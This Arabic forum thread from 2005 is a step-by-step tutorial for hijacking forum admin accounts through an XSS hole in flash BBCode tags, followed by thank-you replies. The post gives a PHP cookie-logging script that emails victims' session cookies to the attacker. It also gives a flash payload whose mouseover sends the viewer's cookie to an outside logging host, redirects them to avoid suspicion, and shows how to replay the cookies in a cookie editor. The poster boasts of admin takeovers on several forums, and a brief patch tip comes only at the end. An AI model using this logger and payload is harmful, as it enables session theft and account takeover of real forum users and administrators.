:::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::

zmani · #1 (**permalink**) 06-13-2005, 01:28 PM

بمنااااسبة انتهااااااء الاختبااااراااااات وبدأ الاجااااازة الصيفية حبيت اقدم لكم شرح مفصل لاحدى ثغرات xss

الا وهي ثغرة الصندوق السحري والمااااااسي

طبعااااا اخونا العندليب اكتشف ثغرة في الصندوقين السحري والماسي\ ثغرة الفلاش \ ثغرة الريلر بلير\ ثغرة تنسيق القصيدة\

الان بشرح لكم ثغرة الفلاش لكثرة استخدامهاااا المنتشر في المنتدياااااااات والمنتديات المصاابة بهااااا كثير للغاية بنسة 95%

وقليل اللي مرقعهاااااااا

لانهم بيقولون استغلالها صعب بس مافية شيء صعب مع الحيل والافكاااااااااااااااار ؟

طبعاااااااا الثغرة جربتها على 3 منتديات احدى المنتديات قدرت ادخل بنك الادمن وو7 مشرفين خلال ساعة ؟ طيب مايهمنا ؟

الحين بشرح لكم كل شيء باختصاااااااااااار ركزوااااااااااااا؟

اقرأ العبااااااااااااااااااارة التااااااااااااالية
اقسم بالله ااااانني لااستخدمهااااااااااااااا ضد اخواني المسلمين
انا طبقت الثغرة على منتديات كثيره ورحت للأدمن اعطيته موضوع لي وفية فلاش حلووو على كيفك دخل الصفحة ومرر الماوس

فقط وعلى طول جاني الكوكيز حقة مثل البرق خلال اقل من دقيقة دخلت بنكة

الادوات التي بنستخدم:
لوجو وجبت لكم لوجو جديد من برمجة الأخ ديفيل
ملاحظة جدااا مهمة بالنسبة لاي سطر توجد فية نجوم زي كذا ****** عددها 6 فاعرف انها كلمة

c o o k i e انت امسح النجوم وحط مكانها نفس الكلمة لان الكلمة مشفره بالمنتدى وبالتالي يطلع لنا نجووم

كود PHP:

  <?php

/* S4aLog v1.0 [ Beta ]

-----------------------

**Beta Of S4aLog v1.0 With Str_Repalce <;>

! You Can Get ******s And Refresh The Broweser ! v0.10

[ New New New ]

!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=******s 

[ MSG ]

Name : Attack1

******s : ******s

Refresh : http://www.s4a.xx

[ MSG ]!

!

Get ******s Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;

!

[ New New New ]

*/

$YourMail = "ta_raq@hotmail.com";  // Your E-mail

/*-----------------------*/

$Ip = $REMOTE_ADDR;

$*****_e = $_GET['id'];

$NameOfAttack = $_GET['nm'];

$Refresh = $_GET['re'];

/* Start */

$Replace******1 = array("=",";");

$Replace******2 = array("[ "," ]  ");

$*****_e = str_replace($Replace******1,$Replace******2,$*****  _e); // Replace

/* e.x hash=0210; | hash[0210]*/

//***************************************//

$Hdr = "From: S4aLog <log-v1@s4a.cc>";

$Msg =

"

Mr Attacker ;) ,,, S4aLog v1 Beta <<

[ ".$NameOfAttack." ] ,, Name Of Attack

[ ".$Refresh." ] ,, Refresh Page

[ ".$Ip." ] ,, Ip

[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]

[ devil-00@hotmail.co.uk - devil.00@gmail.com ]

-----------------------------------------------

****** ::

".$*****_e."

";

/* ------------------------------------------------------------------------- */

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

/**************************************************      ***************************/

if($Send){

if($Refresh <> ""){header("location:".$Refresh);}

}

?>

طيب الحين ارفع الوجو على النت بس هنااااك ملاحظة::::: قبل لاترفعة على النت غير الايميل اللي بداخل اللوجو الى ايملك هنااااا

YourMail = "ta_raq@hotmail.com"; // Your E-mail
طبعا هذا بداخل اللوجو غيرة الى ايميلك واللي يحتاااج الى تغير هو::ta_raq@hotmail.com)::: هذا فقط ولما تغير الايميل سوي لة حفظ

وارفع الوجو على النت الان خلاص الوجو وانتهيناااا منه؟

الحين نجي للمهم وهو كود الثغرة وراح نطبق احدى ثغرات الصندوق والتجربة راح تكون لثغرة الفلاش؟

كود ثغرة الفلاش هووو::::

كود PHP:

  [flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(########################.##################);'[/flash]

كيفية ربط ثغرة الفلاش بالوجو وهو الاهم؟؟

انا بشرح لكم بالتفصيل على الرابط التالي عشان الكل يفهم بسرعة \

كود PHP:

  [flash=http://www.arab4nokia.net/up/upload/asaa.swf]onmouseover='location.href="http://www.jms-herbs.com/log.php?nm=al-battar.net&re=http://bdr130.net/vb/newthread.php?do=newthread&f=40&id="+########################.##################'[/flash]

الاشياء اللي تحتااااااج الى تغيرررر على النحووو التالي \

طيب الان نمسك الكود خطوة خطوة><><><
1__ كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع هذا يااخواني رابط الفلاش اللي تبي يطلع في الصفحة مثلا لو حطيت الفلاش
في توقيعك انت على كيفك تحط الفلاش على اناشيد اسلامية او فلاش مرعب او فلاش العاب او الخخخخ على كيفك خذ لك اقرب فلاش

بالنت بس نصيحتي لك يكون حجمة قليل مو كثير عشان مايعلق بالصفحة \
2_http://www.jms-herbs.com/log.php هذا رابط اللوجوو اللي قلت لكم ارفعوة للنت غير الى الموقع اللي رفعته عليه الظاااهر مايحتاااج توضيح اكثر \
3_http://bdr130.net/vb/newthread.php?do=newthread&f=40هذا مهم ياشباب مثلا اللي انت ناوي علية لما يمرر الماوس على الفلاش اكيد بتتغير الصفحة وبينتقل الى صفحة اخررررى انت خليك مثلي انا خليته يرجع للصفحة نفسهاااااا عشان مايشك الضحية وتقدر تغيرها لاي رابط تبي وانا حطيتها على نفس الوضوع الي كتبته يعني لك الحريه لاكن الافضل انك توهم الضحيه ومايشك
طبعا الاخ ديفيل جزاه الله خير طور الوجو ؟؟ الوجو الاول كان لما بيمرر الضحية الماوس بينقلة الى صفحة بيضاء وهنااا بيشك الضحية بيقول وش جاب الصفحة البيضاء الحين لكن اخوي ديفل طور الوجو الثاني وترك لك الاختيار على كيفك حط اي صفحة تريد تحويل الضحية

لها عشان مايشك ابدااااااا
طيب ممكن يسال احدكم وبيقول اناحااااط الوجو في كم منتدى ولا اعرف معلومااااات الكوكيز اللي بتصل للايميل لاي منتدى ؟؟؟

الاجاااااابة : الخطوة رقم 3_http://bdr130.net/vb/newthread.php?do=newthread&f=40 اللي توهم فيها الضحية راح تجيك داخل الرسالة

اللي بتجيك على ايميلك وبكذا تعرف الكوكيز لاي منتدى ؟؟؟؟؟
طبعااااااااااا الكوكيز بيوصل لك على الايميل بالشكل التالي اللي بنحتاجة بس هووووووو::
****** ::
bblastvisit[ 1118533206 ] bblastactivity[ deleted ] bbuserid[ 4 ] bbpassword[
70c57b1de64b4bf4a10ed46886d77d10 ] bbsessionhash[
618175907d547968ee1e82b796c288ac ] bbforum_view[
ax3x-ix3yix1118527344yix35yix1118527616yix38yix11185278 05y_ ]
bbthread_lastview[ ax1x-ix1245ysx10x\"1117254496\"y_
طبعاااااااااااا لازم تكون مسجل في المنتدى اللي ناوي علية عشان تغير معلوماتك بمعلومات الضحية

bbpassword
bbuserid
bblastactivity
bblastvisit
يعني بالعربي على حسب المعلومات الي تجيك على الوجو سويها مثلها
ملاحظة قفل كل صفحااااااااااااات الاكس بلور او فاير فوكس او اي متصفح اللي تستخدمة
الان افتح برناااااامج كوكيز ايدتور Editc o o k i eالظاااااااااااااهر البرناااااامج موجود عند الكل لانه استخدم في ثغرات من قبل؟

افتح برنااااامج Editc o o k i eوعلى طول اكتب اسم الموقع بجنب كلمة look for

والموقع اللي بنجرب علية منتدى مدرسة المشاغبين اكتب اسم الموقع bdr130.netبعدين go

الحين طلع لك زي كذا

bbpassword
bbuserid
bblastactivity
bblastvisit
ملالاحظة
bb الكل ملاحظهاااا مو كل المنتديات بيجي مثلها اقصد حرف bb اللي تبدأ فية كل كلمة لا عادي يمكن تلقى منتدى يبدأ بــ rr عااادي جداا

على حسب اللي موجود في ملف الكوفينج ؟
طيب الان غير معلوماتك بمعلوماااااااااات الضحية التي وصلت لك على الوجو كما في الصورة

وبعدين روح الان افتح المتصفح وعلى طول طير للمنتدى الضحية راح تلقى نفسك ادمن مكتوب او العضو الي بتدخل في نكه؟
اهلا بكم يـــــا ............... نفس ماسويت على بعض المنتديات::::
وتمت التجربة4 منتديات والحمد لله تم الدخول ادمن
شباب الثغرة شغال في اغلب المنتديات واستغلالها سهل للغاية انتوا شفتوا الشرح طويل انا تعمدت اطولة عشان الكل يفهم ولا هو المفروض في 8 سطور تكفية
سوف ارفق ملف الوجو وكود ربط الفلاش بالوجو ورابط برنامج تحرير الكوكيز بالمرفقات وذالك بسبب النجوم الظاهره باكواد الثغره
لان كلمة كوكيز مشفره
كلمة اخيرااااااااااا اوجهها لكم : ارجو منكم عدم استخدااااااااام الثغرة في المنتديااااااات العربية
اللهم اني بغلت اللهم فاااااشهد؟
قبل لاننهي موضوعنااااااا للذين يردون ترقيع الثغرة عندي طريقة حلووووووة

وخفيفة على الكل ولا تحتاااج لخبرة وهذي الطريقه اخذتها من اخوي البدر(ابو عمر)جزاه الله خير
قالي لا تعدل ملفات ولا شي ولا وجع راس
كلمة c o o k ie اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة ؟ كما تلاحظون كلمة c o o ki e جلعت بين الحروف مسااافة لاني لو كتبتها عااادية
سوف تطلع على شكل نجوم
في طريقة ثانية للترقيع الا وهي طريقة العندليب ملف تستبدلة كاااااامل انت مخير في اي طريقة تريد

بالنسة لملف العندليب الي يبيها بجيبها له وعلى ما اعتقد انها موجوده بالمنتدى
واذا ماحصلناها نجيبها*_^
################################################## ##
################################################## ####
#########وفي الاخير تقبلوا تحياااااااااااااااااااااااااااااتي اخوكم zmani########
########ارجو من الذين ينقلون الشرح ان يحفضوا الحقوق لصااااااحبهااااااااا###########
################################################## #########
################################################## ###########
##########في امان الله لنااااااااااا لقااااااااااااء في دروس قااااااااااااادمة###################
################################################## ################

ابو عمر · #2 (**permalink**) 06-13-2005, 01:31 PM

مشكوووووور اخوي

alk@sser · #3 (**permalink**) 07-10-2005, 02:52 AM

ياسلام عليك

مشكور اخوي عل هذا الشرح الوافي

مجهود ولا اروع

في انتظار المزيد من ابداعاتك

تحياتي

شاعرة الغرام · #4 (**permalink**) 07-10-2005, 05:31 AM

يسلمووووو اخووووووووي
في انتظار كل جديدك

NzF · #5 (**permalink**) 03-15-2006, 01:00 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة zmani

################################################## ##
################################################## ####
#########وفي الاخير تقبلوا تحياااااااااااااااااااااااااااااتي اخوكم zmani########
########ارجو من الذين ينقلون الشرح ان يحفضوا الحقوق لصااااااحبهااااااااا###########
################################################## #########
################################################## ###########
##########في امان الله لنااااااااااا لقااااااااااااء في دروس قااااااااااااادمة###################
################################################## ################

يعطيك العافيه بس ياليت اخوي تحفظ الحقوق حق صاحبها كريمنال نت

صاحب الموضوع الاصلي ...

استضافة مواقع	معنى كلمة	رسائل مسجات	دردشة شات	افلام مقاطع فلم مقطع
مكتبة فلاش اسلامي	الثقافة الجنسية	صور في صورة	شات صوتي	الأسره المسلمه
ابتسامات خلفيات	العاب جديدة	دليل مواقع	احداثيات gps	القرآن الكريم
بطاقات كروت	جوال موبايل	جافا java	قصص روايات	sitemap
كتب الكترونية	ماسنجر في مسنجر	خطوط	وصلات روابط	العاب بنات للبنات فقط

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

:::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::

الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus